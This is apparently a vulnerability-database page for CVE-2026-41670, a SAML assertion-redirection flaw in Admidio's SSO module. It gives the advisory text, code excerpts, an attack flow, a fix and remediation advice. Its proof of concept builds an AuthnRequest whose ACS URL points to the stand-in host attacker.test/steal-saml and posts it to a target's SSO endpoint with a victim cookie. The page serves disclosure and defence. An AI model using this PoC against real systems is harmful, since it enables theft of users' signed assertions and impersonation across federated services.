Skip to main content

Admidio CVE-2026-41670

| EUVDEUVD-2026-28281 HIGH
Improper Input Validation (CWE-20)
2026-04-29 https://github.com/Admidio/admidio GHSA-p9w9-87c8-m235
8.2
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.2 HIGH
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

4
Source Code Evidence Fetched
Apr 29, 2026 - 22:16 vuln.today
Analysis Generated
Apr 29, 2026 - 22:16 vuln.today
Analysis Generated
Apr 29, 2026 - 22:00 vuln.today
CVE Published
Apr 29, 2026 - 21:57 nvd
HIGH 8.2

DescriptionGitHub Advisory

Summary

The SAML IdP implementation in Admidio's SSO module uses the AssertionConsumerServiceURL value directly from incoming SAML AuthnRequest messages as the destination for the SAML response, without validating it against the registered ACS URL (smc_acs_url) stored in the database for the corresponding service provider client. An attacker who knows the Entity ID of a registered SP client can craft a SAML AuthnRequest with an arbitrary AssertionConsumerServiceURL, causing the IdP to send the signed SAML response -- containing user identity attributes (login name, email, roles, profile fields) -- to an attacker-controlled URL.

Details

The vulnerability is in src/SSO/Service/SAMLService.php, in handleSSORequest() at lines 439-465:

php
// Line 439: ACS URL extracted directly from the AuthnRequest (attacker-controlled)
$clientACS = $request->getAssertionConsumerServiceURL();

// ...

// Line 456: Used as the Destination of the SAML Response
$response->setDestination($clientACS);

// Lines 463-465: Also used as the Recipient in SubjectConfirmationData
$subjectConfirmationData = new \LightSaml\Model\Assertion\SubjectConfirmationData();
$subjectConfirmationData
    ->setRecipient($clientACS) // Required recipient URL

There is no code that compares $clientACS against the client's registered smc_acs_url column value. The SAML 2.0 specification and OASIS security considerations explicitly require IdPs to verify that the AssertionConsumerServiceURL matches one of the SP's registered ACS endpoints.

Signature validation is conditional and does not prevent this attack:

At lines 417-419:

php
if ($client->getValue('smc_require_auth_signed') || $client->getValue('smc_validate_signatures')) {
    $this->validateSignature($client, $request, $client->getValue('smc_require_auth_signed'));
}

If neither smc_require_auth_signed nor smc_validate_signatures is enabled for the SP client (which is the default when creating a new client), the AuthnRequest is processed without any signature verification. This means an attacker only needs to know the SP's Entity ID (which is often publicly discoverable from the SP's metadata endpoint) to craft a malicious AuthnRequest.

Even when signatures ARE validated, the ACS URL should still be checked against the registered value, because:

  • Signature validation proves the request came from the SP, not that the ACS URL is authorized
  • If the SP's signing key is compromised, the ACS URL becomes the last line of defense
  • This follows the defense-in-depth principle mandated by SAML 2.0 Profiles Section 4.1.4.1

The same pattern exists in the error response path at lines 323-326:

php
} elseif (method_exists($request, 'getAssertionConsumerServiceURL')) {
    $response->setDestination($request->getAssertionConsumerServiceURL());
} else {
    $response->setDestination($client->getValue('smc_acs_url'));
}

Attack flow:

  1. Attacker discovers the Entity ID of a SAML client registered in Admidio (e.g., from the SP's public metadata)
  2. Attacker crafts a SAML AuthnRequest with the legitimate Entity ID but an attacker-controlled AssertionConsumerServiceURL
  3. Attacker sends this AuthnRequest to Admidio's SSO endpoint (via redirect or auto-submitting form)
  4. If the user is already logged in to Admidio, the IdP generates a signed SAML response with the user's identity and attributes
  5. The SAML response is POST-binding-sent to the attacker's URL via an auto-submitting HTML form rendered in the victim's browser
  6. The attacker receives the signed SAML assertion containing login name, email, full name, roles, and other profile fields
  7. The attacker can replay this SAML assertion to the legitimate SP (since it is validly signed by the IdP)

PoC

bash
# Step 1: Generate a malicious SAML AuthnRequest
# This is a base64-encoded SAML AuthnRequest with:
#   - Issuer = the known Entity ID of a registered SP
#   - AssertionConsumerServiceURL = attacker's server
# Example AuthnRequest XML (before base64 encoding):
# <samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
#   xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
#   ID="_test123"
#   Version="2.0"
#   IssueInstant="2026-03-17T00:00:00Z"
#   AssertionConsumerServiceURL="https://attacker.test/steal-saml"
#   ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST">
#   <saml:Issuer>https://legitimate-sp.test/metadata</saml:Issuer>
# </samlp:AuthnRequest>

SAML_REQUEST=$(echo -n '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_test123" Version="2.0" IssueInstant="2026-03-17T00:00:00Z" AssertionConsumerServiceURL="https://attacker.test/steal-saml" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"><saml:Issuer>REGISTERED_SP_ENTITY_ID</saml:Issuer></samlp:AuthnRequest>' | base64 -w 0)
# Step 2: Send via HTTP-POST binding to Admidio's SSO endpoint
# (This would typically be done by tricking a logged-in user to visit a page with an auto-submitting form)
curl -X POST "https://TARGET/modules/sso/index.php/saml/sso" \
  -d "SAMLRequest=$SAML_REQUEST" \
  -b "ADMIDIO_SESSION=victim_session_cookie"
# Step 3: If the victim is logged in, Admidio will render an auto-submitting HTML form
# that POSTs the signed SAML Response to https://attacker.test/steal-saml
# The response contains: user login name, email, full name, roles, and any other
# profile fields configured in the SP's field mapping
# Step 4: Attacker receives the signed SAML assertion and can replay it
# to the legitimate SP to authenticate as the victim

Impact

  • User Identity Theft: The signed SAML assertion containing login credentials, email, name, and roles is sent to an attacker-controlled URL. The attacker can replay this assertion to the legitimate SP to impersonate the victim.
  • Information Disclosure: User profile data (email, phone, address, role memberships, and any custom profile fields configured in the SP's field mapping) is exfiltrated.
  • Scope Change (S:C): The IdP vulnerability directly enables impersonation on separate Service Provider applications.
  • No Signature Required: When smc_require_auth_signed is not enabled (default), the attack requires zero knowledge of cryptographic keys -- only the SP's Entity ID.

Recommended Fix

Validate the AssertionConsumerServiceURL from the AuthnRequest against the registered smc_acs_url before using it. In src/SSO/Service/SAMLService.php, add validation after loading the client:

php
// After line 439: $clientACS = $request->getAssertionConsumerServiceURL();

// Validate ACS URL against registered client configuration
$registeredACS = $client->getValue('smc_acs_url');
if (!empty($clientACS) && $clientACS !== $registeredACS) {
    throw new Exception(
        'The AssertionConsumerServiceURL in the AuthnRequest ("' . $clientACS . '") ' .
        'does not match the registered ACS URL for this client. ' .
        'Possible assertion theft attempt.'
    );
}

// If no ACS URL in request, fall back to the registered one
if (empty($clientACS)) {
    $clientACS = $registeredACS;
}

Also apply the same validation in the errorResponse() method at line 323-326:

php
// Replace lines 323-326 with:
if ($request instanceof LogoutRequest) {
    $response->setDestination($client->getValue('smc_slo_url'));
} else {
    // Always use the registered ACS URL, never the request's ACS URL
    $response->setDestination($client->getValue('smc_acs_url'));
}

AnalysisAI

SAML response redirection in Admidio 5.0.8 and earlier allows attackers to steal signed authentication assertions containing user credentials and profile data by exploiting missing validation of the AssertionConsumerServiceURL in SAML AuthnRequests. The Identity Provider (IdP) accepts attacker-controlled destination URLs from SAML requests without verifying them against registered Service Provider endpoints, enabling assertion theft and account impersonation across federated applications. No public exploit code identified at time of analysis, though proof-of-concept demonstration is included in the GitHub security advisory GHSA-p9w9-87c8-m235. EPSS data not available for this CVE.

Technical ContextAI

This vulnerability affects Admidio's SAML 2.0 Identity Provider implementation in the SSO module, specifically the SAMLService.php component that handles Single Sign-On authentication flows. SAML (Security Assertion Markup Language) is a federated authentication protocol where Identity Providers issue signed assertions to Service Providers confirming user identity. The OASIS SAML 2.0 specification mandates that IdPs must validate the AssertionConsumerServiceURL (ACS URL) from incoming AuthnRequests against pre-registered SP endpoints to prevent assertion theft. Admidio's implementation extracts the ACS URL directly from the request object via getAssertionConsumerServiceURL() and uses it as both the Destination in the SAML Response and the Recipient in SubjectConfirmationData, without comparing it to the smc_acs_url value stored in the database for the registered client. This violates CWE-20 (Improper Input Validation) by trusting attacker-controlled data for a security-critical routing decision. The vulnerability is compounded by optional signature validation: when smc_require_auth_signed and smc_validate_signatures are both disabled (the default configuration for new SP clients), no cryptographic verification occurs, reducing the attack to knowledge of the SP's Entity ID.

RemediationAI

Upgrade to Admidio version 5.0.9 immediately, which includes validation of AssertionConsumerServiceURL against registered client endpoints as detailed in GitHub security advisory GHSA-p9w9-87c8-m235 (https://github.com/Admidio/admidio/security/advisories/GHSA-p9w9-87c8-m235). For environments unable to upgrade immediately, implement the following compensating controls: (1) Enable smc_require_auth_signed for ALL registered Service Provider clients in the Admidio SSO configuration to enforce AuthnRequest signature validation, which raises the attack bar to key compromise but does not eliminate the vulnerability; (2) Review and restrict access to the SSO endpoint at modules/sso/index.php/saml/sso using web server access controls to trusted networks only, though this breaks legitimate federated SSO for remote users; (3) Monitor web server access logs for suspicious POST requests to the SAML SSO endpoint with unusual SAMLRequest payloads, particularly requests containing AssertionConsumerServiceURL values not matching registered clients; (4) Audit all registered SAML Service Provider clients in the Admidio database (smc_acs_url column) to ensure only authorized applications are configured. Note that workarounds 1-3 do not fully mitigate the vulnerability and introduce operational friction; immediate upgrade to 5.0.9 is the only complete remediation.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-41670 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy